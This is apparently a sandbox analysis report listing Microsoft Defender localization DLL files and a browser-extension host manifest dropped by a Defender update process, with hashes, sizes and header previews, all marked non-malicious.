MD5:	60A2FC65D3CC1D3DE9ECD2C5319738FC
SHA1:	873D18E03523BBE80D1410AA475ED6CC2DAF0D9D
SHA-256:	6C6F52B13235148AF305BD614779EA885C00B64D0BB7CC764E3C67198CC524A2
SHA-512:	36E8930108DA1B953DC07809A9E670F923A4F07EAC9AD2A229844E556595CE7383F35001E43AA6877FF42D9BD42C55BB2BF0ED05E058D4E8CFF65E6B2B7A7BFD
Malicious:	false
Preview:	{.. "name": "com.microsoft.defender.browser_extension.native_message_host",.. "description": "Native host for Microsoft Defender Browser Extension",.. "path": "mpextms.exe",.. "type": "stdio",.. "allowed_origins": [.. "chrome-extension://echcggldkblhodogklpincgchnpgcdco/",.. "chrome-extension://lcmcgbabdcbngcbcfabdncmoppkajglo/".. ]..}

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\cs-CZ\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	64776
Entropy (8bit):	4.539762320385182
Encrypted:	false
SSDEEP:	768:fqqhXzlbrS2tVdqSpbwHjiKMQf4EEEddeat1Pv9/9zuHO:fJhXz1Lf04qjiKMQf4t8eabPLzuHO
MD5:	6EB48597411B21EA974EA7FB32BFC8B0
SHA1:	BED2E05BF31F26E4785316ABAC2950D1F45F5246
SHA-256:	DF15FB1B3D6AF1AB638B441E43A31F77CE15C65D55AA0F7275FE5737E32692F8
SHA-512:	7219DF21268F2E9C24F48B1F14D7C399B6E70243BF99B2DFBE01F502EF2F07D11904B3B6B44E05E468963B32E37ADA35D335E4BF18EFE010939807846AB4A0EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\cs-CZ\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54536
Entropy (8bit):	4.721448918628152
Encrypted:	false
SSDEEP:	768:3NMyciFk6/zRyodW7/obSxnj0v21PT4ed9zuzI:3NMyciFk6/zRy+bSxjyOPd/zuzI
MD5:	A0CC7D88E3250773D9A65306C89754CE
SHA1:	D0796FD9F81B3AA14DA467E0B33D3AC16031DC27
SHA-256:	C0C5A64EB1EE3A4B07AFE4F1339008D11F731E68587F5DE53589DCF4FC531F4A
SHA-512:	D294A08D1315AE9695F60BBEA0AB67AD8C5A48C1D2206AAD6ED9F699C640300C80650A13C8245B0B6806E8A6B09DC70DF88E5A28FE14AAE76E1D6102EDC3C69A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................I.....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\cs-CZ\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30480
Entropy (8bit):	5.302340783561848
Encrypted:	false
SSDEEP:	768:oY45SCVYNbEg20U2pC5DqH9PVrMB1P0EXzg9zIl:oY45SCVYNbf20U2pC5DqH9PVrM3PRDoA
MD5:	3DE9335C531194088181B57CB1E9A327
SHA1:	5E95D46B1CC07D2A911E10F2EA98236E2BDCE41C
SHA-256:	14FE5259D9E30793CEBA234606986081165B5C28EBBFEEDF30DD6DAC90CA04B5
SHA-512:	284D6D4AB7013E89235187B13E6CB1410D0F81C2D4A1A327771ECA7873FDFB586A78EFF97D4161559219239C46E696BE8C390D67DDBD60D6AE67550995C7C683
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L...zFb...........!.........P...............................................p...........@.......................................... ...M...........R...%...........................................................................................rdata..............................@..@.rsrc....M... ...N..................@..@....zFb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...H...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\cy-GB\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	5.062234437378297
Encrypted:	false
SSDEEP:	384:EZ3aB5CKtgWhPbjY2YQYTZYRgaM3cNqng73m3cX3u3cjgTyTKT3TsjxTPTBTnTbn:/CNP9K17Xc502zr7MDg1PjK3l9zuADF
MD5:	365E7E85D1239892F39420F89DEE847D
SHA1:	DBA5C2BABB98EE17BCE73D8F71EE49BE16865CFE
SHA-256:	43A375E16C1B311BA47824A95841AF41D4E64BD233156ED8AA9905E0801B8326
SHA-512:	B92A0FD071C3BF1850C906FA43EB9998B25524E614076304D8E8C1A5FDADE775764577531C4F356CB52E4401939178D85742C0161795D2A0C28F2C0C14EC1C3B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L...}Fb...........!.........Z......................................................d.....@.......................................... ...V...........\...%...........................................................................................rdata..............................@..@.rsrc....V... ...X..................@..@....}Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...Q...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\da-DK\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	65288
Entropy (8bit):	4.288309702869772
Encrypted:	false
SSDEEP:	768:5XbQqbSuL8rmOXbO5OKi9O06k1P9QP9zuGHF:5rQqeuL8bs0P4zuI
MD5:	EA63A57BBC6871C805C4CF8E7CE21115
SHA1:	E9ACB22FBAEE96C229638F90441AF46ABAE9CCFE
SHA-256:	595AC536B9D8020F60B4E9F8D30D132AFCFB22A984B5867ABBA4FC748888C0CE
SHA-512:	651567895C8B222E34EF1BC41650A9678FAF09BEAA7023710EF2714A94D3B1054C042A5FA227ABFFC64FEFB93A3E5110C0D0F0E8DB53AC22DF4E4CA54B96E1D7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................'.....@.......................................... ..d................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\da-DK\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55560
Entropy (8bit):	4.517868844714394
Encrypted:	false
SSDEEP:	384:M7jcx80WKqt9o5uDwepIRXVCQECoz0NKERDH9rLdGtqWFwLWlDBRJxosRmuTcR9U:MMxnkCk1PxtRmuU9zux
MD5:	8CEBC84C305B92C55B9E2027D667B882
SHA1:	3E8B82DD11D610DF7440E917492420B94B061114
SHA-256:	A32D306D66B9ACE067639D208611A35DCA0E744BF64386355005BC2766094A1D
SHA-512:	EB21E59DC776A0E9958421D2BEB24E04BD843ABEF990454A9BF34E5F11D27A9C11B7B951E973B9F2EC2ADD013613252D43379D1471731550A14D3642AC84914C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................S.....@.......................................... ..................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\da-DK\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30992
Entropy (8bit):	5.096060235880487
Encrypted:	false
SSDEEP:	384:19LioDW3dUYBHI8kGSFsWSa/WyDBRJSWF//dJR9z3oKAyO:LL6UYBS5T1PSWF//dj9zYK5O
MD5:	24E2FCD941C292DD018D68C8EA771789
SHA1:	542B7EC448DDEEA66C93501D6A75A34698CF3B95
SHA-256:	D48D801780D749DAABD097328BBC7561DC893CDAAA5236EE39F8ACB527B79454
SHA-512:	2318BEC06A945DEACA8BFF246950E1F2B7806B3B2012B054082CDAA30C8379E41B1ED13A69E8044C4E69511EC20D77EF8083775E48ECA4E4DC8E33C446674F33
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........R...............................................p............@.......................................... ...O...........T...%...........................................................................................rdata..............................@..@.rsrc....O... ...P..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...J...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\de-DE\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	71944
Entropy (8bit):	4.252595640462028
Encrypted:	false
SSDEEP:	1536:T9J3V9/mgBgOPS611GRq9QRquPJAQ7Y8PU0zuit:T9J3V8gBgOPS611s6QRquRAQ7Y8M0/t
MD5:	3915C914A1A4E67818B646380684E1FD
SHA1:	6FED0E08DC98E4CCD3779F7D1582FF74DB0E9E3F
SHA-256:	50C1397C2BE5501515877DF8B6702EB97796D130AEBA7D77201882D309B1FA46
SHA-512:	C0C6FB33E5D23010CF93DA9715D8FC6BDF8A1099D8C05DB800C928DFEDFF44CC7D11C308322FD720CB426BA1661FE6ABE78C97FCDE1619F6432B1FE1A408381D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\de-DE\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55560
Entropy (8bit):	4.568689281210318
Encrypted:	false
SSDEEP:	768:8+OW84CvPTO3VUtmUz8J0GXv3Y1Vqp11PgRmuU9zuGq:8a84kt9qAGzPCd8zuGq
MD5:	95D83D941160AB42F4D7651B7FE7C480
SHA1:	F285ECFC7206AA89B55416D6664A3A09CD760134
SHA-256:	A29DCD99F74EBC1AC8DE7C47F016E6620822B4134F4F579AB0FF0DDE12FBF059
SHA-512:	8B3A4AA7F6B9B791F2A39E3FDEC39E0FB8635FBC8A7498CF5253234F5ACEF8CE65F9FCA6CB1CE99F971507AA35229484C7318F9DFC42FF8F547A8CF3431DAFCC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................9)....@.......................................... ..@................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\de-DE\ProtectionManagement.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	57096
Entropy (8bit):	5.707571249819799
Encrypted:	false
SSDEEP:	1536:xbQrBcpTdT+2fB8ce6Lt9v1yX1Z9m9Pcf9XzuM:xbFDfBO6LtHyFZ9m90f9XV
MD5:	E058F384C93A0CA13E1AAC0625BDA2B2
SHA1:	7ED949C3F85BBF197A270165F54C19C48A01BABF
SHA-256:	C254187D3F1192D7C7775CAF6539ACB0E349A264AA450A49963BAA06C7C8BC36
SHA-512:	A150D34A3F8AAB0426AAFEB8ECA8F621E74C1ACA8E396075988B075B9B4085919D65307C82273D5573F08145D48E4B38DCE9707E1342CE2684349E349C8F250C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ..t................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@....h...........l...P...P.......h...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%.......rsrc$02.... ...Ml.G...s.R.......%#~&..e.;.h...........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\de-DE\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34056
Entropy (8bit):	4.985858053212069
Encrypted:	false
SSDEEP:	768:92JncLb+imgi7G1iSMbsHrWzxEzN4gYdGdmYJJnwr1Pqadk9zu7:92JncLb+imgi7G1iSMbsHrWzxEzN4gYf
MD5:	8AD55684FDFB2219738F55FD4A274AA5
SHA1:	E66A4244DA78D3E3099ABD70794A5EB575997FDE
SHA-256:	6BE220553B3688AB830F224DE845DA5D126AB277DD2A1D1F2B22DB1FC1DC53BE
SHA-512:	CD4E1309B713A65D45D7C50E85C66C3B0E25D79A1B60F21A2FF6CFAF2C71EBA8ADC657F2F6E1E57C31A2593FA6F6F519C56B69FA68FAAEB5CA09A948FD010D90
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........^......................................................#.....@.......................................... ...[...........`...%...........................................................................................rdata..............................@..@.rsrc....[... ...\..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...V...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\el-GR\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	77064
Entropy (8bit):	4.767573200668664
Encrypted:	false
SSDEEP:	1536:f3yX1ESgKNnNL+/3uj7eCMEE+gL8hKfGujCCaCa3hPdzuF:f3yX1ESgKNnNL+/3uj7eCMEE+gL8hKfL
MD5:	A0EF50D535FBCFE3E24F44E67A995649
SHA1:	7FA385DE7A17FBE6E76BEB5445B98884BCB02A46
SHA-256:	D743A3E8D4E2548F75DEC801EAC22366DCF93464F2FC8E8915FB510B3CF10089
SHA-512:	0FC1932103E48C45E85E8E52740A7348572AA8774632083A5BC11167D48E448E7DFD9BABE647B17C80FCF32811B39CA01712C4007B2569A28DEFF1039629BD54
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0......X.....@.......................................... ..D................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\el-GR\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	61192
Entropy (8bit):	5.089810908697271
Encrypted:	false
SSDEEP:	768:b0d0tgeGeGsnEstzuFtGFil0abb1PR3l9zuA1:b7gTsnPtzuFtGFil04xPRHzuA1
MD5:	F145E23377BA647751CAB9F773B74B40
SHA1:	23EDCB4714BA64E23D3C7135FF7AC46866BA2167
SHA-256:	489D6E551DD7679E3F5AAF0DF5FDCFAD253DC8FFDD6AC1CB50F0FDCB082464B6
SHA-512:	97BF4834A9351E7FED41FF66075EA48D6BA845B9CC73EAF4F7F75E4D1E2435108B8834053502D5EE414BCF73C672CF78ACC59F24D9AC93EEBD29BB0F588B0D8E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................;.....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\el-GR\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34056
Entropy (8bit):	5.5406380457481275
Encrypted:	false
SSDEEP:	384:XqFfMBvhQGS4st/0lDYpOLjNB4Okn8OM3mnUJOesPc5yLOe0vNQgehkbhbDvyBIs:UTHkbYICWC1PoOMufiC9zuu7
MD5:	3AF45C4F026DE2BD41095971AE07F7E7
SHA1:	ADF1A6999770D7BAF4CE3C14C1B937BD34F6F010
SHA-256:	C28A0BD6E7E6BB981DE1E8B7BD01F3E53C2379D97A826F70505716634314EDC3
SHA-512:	36513C0C2C1648E504ACB722513AE3D3EF02C6E536A9876758FC092FD22B2F5AD84A89A119FC989FBEE530871ACF7AF2A93DEBA9D851285D9E759C9731F7587D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........^...........................................................@.......................................... ..XZ...........`...%...........................................................................................rdata..............................@..@.rsrc...XZ... ...\..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..`U...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\en-GB\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	60688
Entropy (8bit):	4.3859446393636565
Encrypted:	false
SSDEEP:	768:qjJb3XsmaEiqcTfX47sEBhEChEehELQRQ4hE4BS1PEWF//dj9zA:GJb3XDaZqcc7skv7rNiPEWZzA
MD5:	7879D8BF62B38216560A8F03362D9055
SHA1:	30844E1A50C4A88EC94B084A85A0D663536B1FC5
SHA-256:	0FD4E14FD08378B0ED203FF0A46B6C9DC7177C1353F3A775495A81884B2229EF
SHA-512:	138491982B5DAB45C7BBE53941DB1551274D12150776DE60CA085982BA93CFCA736E89988A4C7F0589FFE20D12D85BAF7AC447A9BE7C5AD319776B1F3F26BBD2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................!Y....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\en-GB\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29960
Entropy (8bit):	5.174388743615685
Encrypted:	false
SSDEEP:	384:t4D3hR3yaTyWSa/WXhDBRJfleLR9zusk2IMsWB:qL5s1P9ed9zuzwB
MD5:	A97A1973A0D350BD6B01320E8FE383E3
SHA1:	09A183545FB8A35A7C7284B3F1A4A80886C3E9D3
SHA-256:	42E02FB4ED8F1C418BEEAA720BD77863ADE09A426447555DCF4D149A88AD0BFA
SHA-512:	36696A0E6CA4D067D265A0B0E894B90571AA38A4728BDD2588A8E97D8CECDA6D98509317E92B46F90DFFC74AC30C76390D68B927161AD58B40B10BE564E3FAC8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........N...............................................p............@.......................................... ...J...........P...%...........................................................................................rdata..............................@..@.rsrc....J... ...L..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...F...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\en-US\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	60688
Entropy (8bit):	4.382343941028601
Encrypted:	false
SSDEEP:	768:UiJbyt33vY7EhrdTXn147vXahEzhEthEGQRQwhEHBf91PwWF//dj9z2u:dJbytHi6rdW7vM+4IofrPwWZzN
MD5:	0F611252E086EB867FC2C922C0C9C67A
SHA1:	F7D5F383CEC09071F77DD55BDC627C127F65AB03
SHA-256:	A02E89C5F7CD3D7FE9C391D0B1BBAE49F2D5BBF91195FC68016C45B1D5B92BC8
SHA-512:	DD6C4064C2E64F60BF5B8F53FBC52985E3EB971F970C862DEBE1EB6052ABD4AD384F6E7A30C8EFB6DEA1B87775763D57D5FC20482FBA501DF5ED19CD9D3F5502
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\en-US\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	52992
Entropy (8bit):	4.570091739848444
Encrypted:	false
SSDEEP:	384:bvorOioFEr4H1n3/Dtkby/g1mwhqfB9hyINcNkHoal34Y0wNl8SWuqBWSDBRJ7BU:bjBH1/b4Y0wNl8iq11PbXi9z/
MD5:	AB22FBE5B04AF3A8CCA9FF37B0B50646
SHA1:	907477AC48D473A58C0C268577F1F9B9895E1E49
SHA-256:	AA98AA03282511220A2EF1D21A6CB9ED74768ABDB833518C4ED4A8143F905601
SHA-512:	BB0401073864475531B9DE4ED7E943D7C7880854CD0700ED78138BF5C712F2506778BAC19876D4D5C95F25C283AAD303C34EEC845CF8E963B23887A2ED382D6B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ..$................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\en-US\ProtectionManagement.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	56576
Entropy (8bit):	4.5055325949538245
Encrypted:	false
SSDEEP:	768:lHsZMfSQJK67vzU9+YXKujpbX2mXEQpwVhjhxp3v1PhWXi9z5:ltfSeEZXKOXKRtPo+z5
MD5:	5646EDDACE9BC3585E399CA913E4D12B
SHA1:	906FEF91DC1F9AC166C8842BA1B8B0370635924A
SHA-256:	20781C2598A479543EC3F4253D69AABA9A5774B0C37BEC29BECAE71D25B1533C
SHA-512:	6CF0F53B699CFF9F9C254AAD2FB2C47F7287F1E9E9CE1BBE40E3034E7907EF844D054FDFC8E362BA19B1493F9DF9476784F9D04F6B173C2F3F7AF09943D531B3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................n....@.......................................... ..\................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@....h...........l...P...P.......h...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%.......rsrc$02.... ...Ml.G...s.R.......%#~&..e.;.h...........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\en-US\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	5.178940108284003
Encrypted:	false
SSDEEP:	384:EenDHkg1Wl+R0UdhR3wVdZ892d4yWSa/W+DBRJ2uTN4tgR9zveJ:Vn7kg1Wl+R0UuVX892dA71PVTNx9zGJ
MD5:	65D83B731260FFA4A3B4A26409EE3A2C
